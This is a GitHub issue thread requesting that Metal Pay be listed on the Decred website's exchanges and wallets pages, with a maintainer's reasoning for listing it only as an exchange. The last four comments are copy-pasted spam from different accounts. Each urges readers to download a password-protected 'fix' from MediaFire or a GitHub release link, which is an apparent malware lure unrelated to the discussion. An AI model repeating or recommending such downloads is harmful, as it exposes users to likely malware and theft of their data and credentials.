### ISSUE TITLE
Add Metal Pay to exchanges and wallets

### ISSUE THREAD

**Issue by jzbz** [decred/dcrweb#867]
Exchanges
Link: https://www.metalpay.com/
Logo: Zip file attached.

Wallets
Android: https://play.google.com/store/apps/details?id=com.metallicus.metalapp.production
iOS: https://apps.apple.com/us/app/metal-pay-metal-payments/id1345101178

[Metal Pay.zip](https://github.com/decred/dcrweb/files/4471373/Metal.Pay.zip)

**Comment by jholdstock** [comment]
#870 added Metal Pay to the exchanges page, but I am reluctant to add it to the wallets page because it seems to just be a custodial exchange with a mobile app.

**Comment by jzbz** [comment]
If it's custodial, we'd need some way of distinguishing it. Just don't add it for now.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
